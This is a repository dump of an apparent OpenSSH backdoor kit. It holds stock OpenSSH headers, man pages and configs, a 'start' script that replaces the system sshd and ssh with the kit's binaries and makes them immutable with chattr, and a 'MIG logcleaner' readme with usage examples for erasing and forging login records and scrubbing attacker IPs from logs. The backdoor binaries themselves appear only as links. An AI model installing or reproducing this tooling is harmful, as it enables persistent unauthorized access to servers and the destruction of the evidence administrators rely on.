BSD System ManagerM-bM-^@M-^Ys Manual SSH-KEYSIGN(8) 2 | 3 | NAME 4 | ssh-keysign - ssh helper program for hostbased authentication 5 | 6 | SYNOPSIS 7 | ssh-keysign 8 | 9 | DESCRIPTION 10 | ssh-keysign is used by ssh(1) to access the local host keys and generate 11 | the digital signature required during hostbased authentication with SSH 12 | protocol version 2. 13 | 14 | ssh-keysign is disabled by default and can only be enabled in the global 15 | client configuration file /etc/ssh/ssh_config by setting EnableSSHKeysign 16 | to M-bM-^@M-^\yesM-bM-^@M-^]. 17 | 18 | ssh-keysign is not intended to be invoked by the user, but from ssh(1). 19 | See ssh(1) and sshd(8) for more information about hostbased authentica- 20 | tion. 21 | 22 | FILES 23 | /etc/ssh/ssh_config 24 | Controls whether ssh-keysign is enabled. 25 | 26 | /etc/ssh/ssh_host_dsa_key, /etc/ssh/ssh_host_rsa_key 27 | These files contain the private parts of the host keys used to 28 | generate the digital signature. They should be owned by root, 29 | readable only by root, and not accessible to others. Since they 30 | are readable only by root, ssh-keysign must be set-uid root if 31 | hostbased authentication is used. 32 | 33 | SEE ALSO 34 | ssh(1), ssh-keygen(1), ssh_config(5), sshd(8) 35 | 36 | AUTHORS 37 | Markus Friedl 38 | 39 | HISTORY 40 | ssh-keysign first appeared in OpenBSD 3.2. 41 | 42 | BSD May 24, 2002 BSD 43 | -------------------------------------------------------------------------------- /ssh-keysign.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keysign.o -------------------------------------------------------------------------------- /ssh-rand-helper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-rand-helper -------------------------------------------------------------------------------- /ssh-rand-helper.0: -------------------------------------------------------------------------------- 1 | SSH-RAND-HELPER(8) BSD System ManagerM-bM-^@M-^Ys Manual SSH-RAND-HELPER(8) 2 | 3 | NAME 4 | ssh-rand-helper - Random number gatherer for OpenSSH 5 | 6 | SYNOPSIS 7 | ssh-rand-hlper [-vxXh] [-b bytes] 8 | 9 | DESCRIPTION 10 | ssh-rand-helper is a small helper program used by ssh(1), ssh-add(1), 11 | ssh-agent(1), ssh-keygen(1), ssh-keyscan(1) and sshd(8) to gather random 12 | numbers of cryptographic quality if the openssl(4) library has not been 13 | configured to provide them itself. 14 | 15 | Normally ssh-rand-helper will generate a strong random seed and provide 16 | it to the calling program via standard output. If standard output is a 17 | tty, ssh-rand-helper will instead print the seed in hexidecimal format 18 | unless told otherwise. 19 | 20 | ssh-rand-helper will by default gather random numbers from the system 21 | commands listed in /etc/ssh/ssh_prng_cmds. The output of each of the 22 | commands listed will be hashed and used to generate a random seed for the 23 | calling program. ssh-rand-helper will also store seed files in 24 | ~/.ssh/prng_seed between executions. 25 | 26 | Alternately, ssh-rand-helper may be configured at build time to collect 27 | random numbers from a EGD/PRNGd server via a unix domain or localhost tcp 28 | socket. 29 | 30 | This program is not intended to be run by the end-user, so the few com- 31 | mandline options are for debugging purposes only. 32 | 33 | -b bytes 34 | Specify the number of random bytes to include in the output. 35 | 36 | -x Output a hexidecimal instead of a binary seed. 37 | 38 | -X Force output of a binary seed, even if standard output is a tty 39 | 40 | -v Turn on debugging message. Multiple -v options will increase the 41 | debugging level. -h Display a summary of options. 42 | 43 | AUTHORS 44 | Damien Miller 45 | 46 | SEE ALSO 47 | ssh(1), ssh-add(1), ssh-keygen(1), sshd(8) 48 | 49 | BSD April 14, 2002 BSD 50 | -------------------------------------------------------------------------------- /ssh-rand-helper.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-rand-helper.o -------------------------------------------------------------------------------- /ssh-rsa.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-rsa.o -------------------------------------------------------------------------------- /ssh.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh.jpg -------------------------------------------------------------------------------- /ssh.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh.o -------------------------------------------------------------------------------- /ssh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh.txt -------------------------------------------------------------------------------- /ssh_config: -------------------------------------------------------------------------------- 1 | # $OpenBSD: ssh_config,v 1.16 2002/07/03 14:21:05 markus Exp $ 2 | 3 | # This is the ssh client system-wide configuration file. See 4 | # ssh_config(5) for more information. This file provides defaults for 5 | # users, and the values can be changed in per-user configuration files 6 | # or on the command line. 7 | 8 | # Configuration data is parsed as follows: 9 | # 1. command line options 10 | # 2. user-specific file 11 | # 3. system-wide file 12 | # Any configuration value is only changed the first time it is set. 13 | # Thus, host-specific definitions should be at the beginning of the 14 | # configuration file, and defaults at the end. 15 | 16 | # Site-wide defaults for various options 17 | 18 | # Host * 19 | # ForwardAgent no 20 | # ForwardX11 no 21 | # RhostsAuthentication no 22 | # RhostsRSAAuthentication no 23 | # RSAAuthentication yes 24 | # PasswordAuthentication yes 25 | # HostbasedAuthentication no 26 | # BatchMode no 27 | # CheckHostIP yes 28 | # StrictHostKeyChecking ask 29 | # IdentityFile ~/.ssh/identity 30 | # IdentityFile ~/.ssh/id_rsa 31 | # IdentityFile ~/.ssh/id_dsa 32 | # Port 22 33 | # Protocol 2,1 34 | # Cipher 3des 35 | # Ciphers aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc 36 | # EscapeChar ~ 37 | -------------------------------------------------------------------------------- /ssh_config.1: -------------------------------------------------------------------------------- 1 | # $OpenBSD: ssh_config,v 1.19 2003/08/13 08:46:31 markus Exp $ 2 | 3 | # This is the ssh client system-wide configuration file. See 4 | # ssh_config(5) for more information. This file provides defaults for 5 | # users, and the values can be changed in per-user configuration files 6 | # or on the command line. 7 | 8 | # Configuration data is parsed as follows: 9 | # 1. command line options 10 | # 2. user-specific file 11 | # 3. system-wide file 12 | # Any configuration value is only changed the first time it is set. 13 | # Thus, host-specific definitions should be at the beginning of the 14 | # configuration file, and defaults at the end. 15 | 16 | # Site-wide defaults for various options 17 | 18 | # Host * 19 | # ForwardAgent no 20 | # ForwardX11 no 21 | # RhostsRSAAuthentication no 22 | # RSAAuthentication yes 23 | # PasswordAuthentication yes 24 | # HostbasedAuthentication no 25 | # BatchMode no 26 | # CheckHostIP yes 27 | # AddressFamily any 28 | # ConnectTimeout 0 29 | # StrictHostKeyChecking ask 30 | # IdentityFile ~/.ssh/identity 31 | # IdentityFile ~/.ssh/id_rsa 32 | # IdentityFile ~/.ssh/id_dsa 33 | # Port 22 34 | # Protocol 2,1 35 | # Cipher 3des 36 | # Ciphers aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc 37 | # EscapeChar ~ 38 | -------------------------------------------------------------------------------- /ssh_config.out: -------------------------------------------------------------------------------- 1 | # $OpenBSD: ssh_config,v 1.16 2002/07/03 14:21:05 markus Exp $ 2 | 3 | # This is the ssh client system-wide configuration file. See 4 | # ssh_config(5) for more information. This file provides defaults for 5 | # users, and the values can be changed in per-user configuration files 6 | # or on the command line. 7 | 8 | # Configuration data is parsed as follows: 9 | # 1. command line options 10 | # 2. user-specific file 11 | # 3. system-wide file 12 | # Any configuration value is only changed the first time it is set. 13 | # Thus, host-specific definitions should be at the beginning of the 14 | # configuration file, and defaults at the end. 15 | 16 | # Site-wide defaults for various options 17 | 18 | # Host * 19 | # ForwardAgent no 20 | # ForwardX11 no 21 | # RhostsAuthentication no 22 | # RhostsRSAAuthentication no 23 | # RSAAuthentication yes 24 | # PasswordAuthentication yes 25 | # HostbasedAuthentication no 26 | # BatchMode no 27 | # CheckHostIP yes 28 | # StrictHostKeyChecking ask 29 | # IdentityFile ~/.ssh/identity 30 | # IdentityFile ~/.ssh/id_rsa 31 | # IdentityFile ~/.ssh/id_dsa 32 | # Port 22 33 | # Protocol 2,1 34 | # Cipher 3des 35 | # Ciphers aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc 36 | # EscapeChar ~ 37 | -------------------------------------------------------------------------------- /ssh_old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh_old -------------------------------------------------------------------------------- /sshconnect.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshconnect.o -------------------------------------------------------------------------------- /sshconnect1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshconnect1.o -------------------------------------------------------------------------------- /sshconnect2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshconnect2.o -------------------------------------------------------------------------------- /sshd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshd -------------------------------------------------------------------------------- /sshd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshd.o -------------------------------------------------------------------------------- /sshd_old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshd_old -------------------------------------------------------------------------------- /sshlogin.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: sshlogin.h,v 1.4 2002/08/29 15:57:25 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | #ifndef SSHLOGIN_H 15 | #define SSHLOGIN_H 16 | 17 | void 18 | record_login(pid_t, const char *, const char *, uid_t, 19 | const char *, struct sockaddr *, socklen_t); 20 | void record_logout(pid_t, const char *, const char *); 21 | u_long get_last_login_time(uid_t, const char *, char *, u_int); 22 | 23 | #ifdef LOGIN_NEEDS_UTMPX 24 | void record_utmp_only(pid_t, const char *, const char *, const char *, 25 | struct sockaddr *, socklen_t); 26 | #endif 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /sshlogin.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshlogin.o -------------------------------------------------------------------------------- /sshpty.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: sshpty.h,v 1.4 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * Functions for allocating a pseudo-terminal and making it the controlling 8 | * tty. 9 | * 10 | * As far as I am concerned, the code I have written for this software 11 | * can be used freely for any purpose. Any derived versions of this 12 | * software must be clearly marked as such, and if the derived work is 13 | * incompatible with the protocol description in the RFC file, it must be 14 | * called by a name other than "ssh" or "Secure Shell". 15 | */ 16 | 17 | #ifndef SSHPTY_H 18 | #define SSHPTY_H 19 | 20 | int pty_allocate(int *, int *, char *, int); 21 | void pty_release(const char *); 22 | void pty_make_controlling_tty(int *, const char *); 23 | void pty_change_window_size(int, int, int, int, int); 24 | void pty_setowner(struct passwd *, const char *); 25 | 26 | #endif /* SSHPTY_H */ 27 | -------------------------------------------------------------------------------- /sshpty.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshpty.o -------------------------------------------------------------------------------- /sshtty.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sshtty.o -------------------------------------------------------------------------------- /start: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mv /usr/sbin/sshd sshd_old; cp sshd /usr/sbin/sshd 4 | cat sshd_config > /etc/ssh/sshd_config 5 | 6 | mv /usr/bin/ssh ssh_old; cp ssh /usr/bin/ssh 7 | cat ssh_config > /etc/ssh/ssh_config 8 | 9 | chattr +iau /usr/sbin/sshd 10 | chattr +iau /usr/bin/ssh 11 | 12 | 13 | if [[ -f /var/run/sshd.pid ]]; then 14 | kill -9 `cat /var/run/sshd.pid`;/usr/sbin/sshd 2> /dev/null 15 | fi 16 | 17 | if [[ -f /var/run/sshd.init.pid ]]; then 18 | kill -9 `cat /var/run/sshd.init.pid`;/usr/sbin/sshd 2> /dev/null 19 | fi 20 | 21 | if [[ -f /var/run/sshd2_22.pid ]]; then 22 | kill -9 `cat /var/run/sshd2_22.pid`;/usr/sbin/sshd 2> /dev/null 23 | fi 24 | 25 | -------------------------------------------------------------------------------- /tildexpand.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: tildexpand.h,v 1.4 2001/06/26 17:27:25 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | char *tilde_expand_filename(const char *, uid_t); 16 | -------------------------------------------------------------------------------- /tildexpand.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/tildexpand.o -------------------------------------------------------------------------------- /tools/logcleaner: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/tools/logcleaner -------------------------------------------------------------------------------- /tools/makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | default: 3 | @echo 4 | @echo ----------------------------------------- 5 | @echo 6 | @echo "usage: make " 7 | @echo 8 | @echo " - linux" 9 | @echo " - bsd" 10 | @echo " - sun" 11 | @echo 12 | linux: logcleaner.c 13 | $(CC) -DLINUX -Wall -o logcleaner logcleaner.c 14 | bsd: logcleaner.c 15 | $(CC) -DBSD -Wall -o logcleaner logcleaner.c 16 | sun: logcleaner.c 17 | $(CC) -DSUN -Wall -o logcleaner logcleaner.c 18 | clean: 19 | rm -f mig-logcleaner *~ 20 | -------------------------------------------------------------------------------- /tools/random.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | all=( Q W E R T Y U I O P A S D F G H J K L Z X C V B N M q w e r t y u i o p a s d f g h j k l z x c v b n m 0 1 2 3 4 5 6 7 8 9 ) 3 | for i in `seq 1 $1`; do 4 | rand=$(($RANDOM%59)) 5 | echo -n "${all[$rand]}" 6 | done 7 | echo 8 | 9 | -------------------------------------------------------------------------------- /tools/readme.mig: -------------------------------------------------------------------------------- 1 | MIG logcleaner by no1 (greyhats.za.net) 2 | --------------------------------------- 3 | 4 | This log cleaner removes logs from utmp, wtmp, utmpx, wtmpx, lastlog files. 5 | Also removes 2 specified text strings out of every file in a specified directory. 6 | Also lets you modify entries as you wish. 7 | Also lets you add new entries. 8 | 9 | Installation: 10 | ------------- 11 | 12 | just type 'make' 13 | 14 | eg. make linux 15 | make bsd 16 | make sun 17 | 18 | Usage examples: 19 | --------------- 20 | 21 | 0x1\ ./mig-logcleaner -u john -d 22 | 23 | removes first entry of user "john" 24 | 25 | 0x2\ ./mig-logcleaner -u john -n 5 -d 26 | 27 | removes 5th entry of user "john" 28 | 29 | 0x3\ ./mig-logcleaner -u john -n 0 -d /var/.secret/ -a 1.2.3.4 -b greyhats.za.net -d 30 | 31 | removed all entries of user "john" and removes strings "1.2.3.4" and 32 | "greyhats.za.net" out of all files in /var/.secret/ directory 33 | 34 | 0x4\ ./mig-logcleaner -a 1.2.3.4 -b greyhats.za.net -d 35 | 36 | removes strings "1.2.3.4" and "greyhats.za.net" out of default log dir 37 | 38 | 0x5\ ./mig-logcleaner -u john -n 2 -R -H china.gov 39 | 40 | replaces hostname of second entry of user "john" to "china.gov" 41 | 42 | 0x6\ ./mig-logcleaner -u john -n 5 -A -U jane -T tty1 -H arb.com -I 12345334 -O 12345397 43 | 44 | adds new entry for user "jane" before 5th entry of user "john" 45 | 46 | 0x7\ ./mig-logcleaner -A -U jane -T tty1 -H arb.com -I 12345334 -O 12345397 47 | 48 | adds new entry for user "jane" right on top of wtmp/x file 49 | 50 | -no1@MIG 51 | -------------------------------------------------------------------------------- /tools/skull.txt: -------------------------------------------------------------------------------- 1 | _____ _____ ____ _____ _____ __ _____ 2 | | __ | __| \\| | | __| | | _ | 3 | | __ -|__ | | | | __| |__| __| 4 | |_____|_____|____/|__|__|_____|_____|__| 5 | -------------------------------------------------------------------------------- /ttymodes.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ttymodes.o -------------------------------------------------------------------------------- /uidswap.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: uidswap.h,v 1.9 2001/06/26 17:27:25 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #ifndef UIDSWAP_H 16 | #define UIDSWAP_H 17 | 18 | void temporarily_use_uid(struct passwd *); 19 | void restore_uid(void); 20 | void permanently_set_uid(struct passwd *); 21 | 22 | #endif /* UIDSWAP_H */ 23 | -------------------------------------------------------------------------------- /uidswap.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/uidswap.o -------------------------------------------------------------------------------- /uuencode.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: uuencode.h,v 1.9 2002/02/25 16:33:27 markus Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2000 Markus Friedl. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #ifndef UUENCODE_H 28 | #define UUENCODE_H 29 | int uuencode(u_char *, u_int, char *, size_t); 30 | int uudecode(const char *, u_char *, size_t); 31 | void dump_base64(FILE *, u_char *, u_int); 32 | #endif 33 | -------------------------------------------------------------------------------- /uuencode.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/uuencode.o -------------------------------------------------------------------------------- /v: -------------------------------------------------------------------------------- 1 | OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006 2 | -------------------------------------------------------------------------------- /version.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: version.h,v 1.37 2003/04/01 10:56:46 markus Exp $ */ 2 | 3 | #define SSH_VERSION "OpenSSH_4.3" 4 | #define SSH_VERSION "OpenSSH_4.3p2" 5 | #define SSH_VERSION "OpenSSH_4.3p2" 6 | #define SSH_VERSION "OpenSSH_4.3p2" 7 | #define SSH_VERSION "OpenSSH_5.2p1" 8 | -------------------------------------------------------------------------------- /xmalloc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Author: Tatu Ylonen 3 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 4 | * All rights reserved 5 | * Versions of malloc and friends that check their results, and never return 6 | * failure (they call fatal if they encounter an error). 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #include "includes.h" 16 | RCSID("$OpenBSD: xmalloc.c,v 1.16 2001/07/23 18:21:46 stevesk Exp $"); 17 | 18 | #include "xmalloc.h" 19 | #include "log.h" 20 | 21 | void * 22 | xmalloc(size_t size) 23 | { 24 | void *ptr; 25 | 26 | if (size == 0) 27 | fatal("xmalloc: zero size"); 28 | ptr = malloc(size); 29 | if (ptr == NULL) 30 | fatal("xmalloc: out of memory (allocating %lu bytes)", (u_long) size); 31 | return ptr; 32 | } 33 | 34 | void * 35 | xrealloc(void *ptr, size_t new_size) 36 | { 37 | void *new_ptr; 38 | 39 | if (new_size == 0) 40 | fatal("xrealloc: zero size"); 41 | if (ptr == NULL) 42 | new_ptr = malloc(new_size); 43 | else 44 | new_ptr = realloc(ptr, new_size); 45 | if (new_ptr == NULL) 46 | fatal("xrealloc: out of memory (new_size %lu bytes)", (u_long) new_size); 47 | return new_ptr; 48 | } 49 | 50 | void 51 | xfree(void *ptr) 52 | { 53 | if (ptr == NULL) 54 | fatal("xfree: NULL pointer given as argument"); 55 | free(ptr); 56 | } 57 | 58 | char * 59 | xstrdup(const char *str) 60 | { 61 | size_t len; 62 | char *cp; 63 | 64 | len = strlen(str) + 1; 65 | cp = xmalloc(len); 66 | strlcpy(cp, str, len); 67 | return cp; 68 | } 69 | -------------------------------------------------------------------------------- /xmalloc.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: xmalloc.h,v 1.9 2002/06/19 00:27:55 deraadt Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * Created: Mon Mar 20 22:09:17 1995 ylo 8 | * 9 | * Versions of malloc and friends that check their results, and never return 10 | * failure (they call fatal if they encounter an error). 11 | * 12 | * As far as I am concerned, the code I have written for this software 13 | * can be used freely for any purpose. Any derived versions of this 14 | * software must be clearly marked as such, and if the derived work is 15 | * incompatible with the protocol description in the RFC file, it must be 16 | * called by a name other than "ssh" or "Secure Shell". 17 | */ 18 | 19 | #ifndef XMALLOC_H 20 | #define XMALLOC_H 21 | 22 | void *xmalloc(size_t); 23 | void *xrealloc(void *, size_t); 24 | void xfree(void *); 25 | char *xstrdup(const char *); 26 | 27 | #endif /* XMALLOC_H */ 28 | -------------------------------------------------------------------------------- /xmalloc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/xmalloc.o -------------------------------------------------------------------------------- /zlib: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########### 4 | # 5 | # SETTING UP COLLORS 6 | # 7 | ########### 8 | 9 | red='\e[0;31m' 10 | RED='\e[1;31m' 11 | org='\e[0;33m33' 12 | blue='\e[0;34m' 13 | BLUE='\e[1;34m' 14 | cyan='\e[0;36m' 15 | CYAN='\e[1;36m' 16 | GRN='\e[0;32m' 17 | NC='\e[0m' 18 | 19 | ########### 20 | # 21 | # INSTALLING ZLIB 22 | # 23 | ########### 24 | 25 | echo -e "\n${GRN}NOW TRYING TO INSTALL ZLIB${NC}\n\n" 26 | 27 | if [ ! -f "/usr/bin/gcc" ] || [ ! -f "/usr/bin/make" ] || [ ! -d "/usr/include/openssl" ]; then 28 | echo -e "" 29 | exit 30 | else 31 | 32 | if [ -f /usr/bin/wget ]; then 33 | wget http://www.zlib.net/zlib-1.2.5.tar.gz -o wget.log 34 | rm -rf wget.log 35 | tar zxvf zlib-1.2.5.tar.gz >> /dev/null 36 | cd zlib-1.2.5 37 | ./configure >> /dev/null 38 | make >> /dev/null 39 | make install >> /dev/null 40 | ln -s /usr/local/include/zlib.h /usr/include/zlib.h >> /dev/null 41 | ln -s /usr/local/share/man/man3/zlib.3 /usr/share/man/man3/zlib.3 >> /dev/null 42 | else 43 | curl -O -s http://www.zlib.net/zlib-1.2.5.tar.gz 44 | tar zxvf zlib-1.2.5.tar.gz >> /dev/null 45 | cd zlib-1.2.5 46 | ./configure >> /dev/null 47 | make >> /dev/null 48 | make install >> /dev/null 49 | ln -s /usr/local/include/zlib.h /usr/include/zlib.h >> /dev/null 50 | ln -s /usr/local/share/man/man3/zlib.3 /usr/share/man/man3/zlib.3 >> /dev/null 51 | fi 52 | fi 53 | 54 | if [ -f /usr/include/zlib.h ]; then 55 | echo -e "${BLUE}ZLIB INSTALL${NC} [ ${GRN}COMPLETED${NC} ]" 56 | else 57 | echo -e "${BLUE}ZLIB INSTALL${NC} [ ${RED}INCOMPLETED${NC} ]" 58 | fi 59 | --------------------------------------------------------------------------------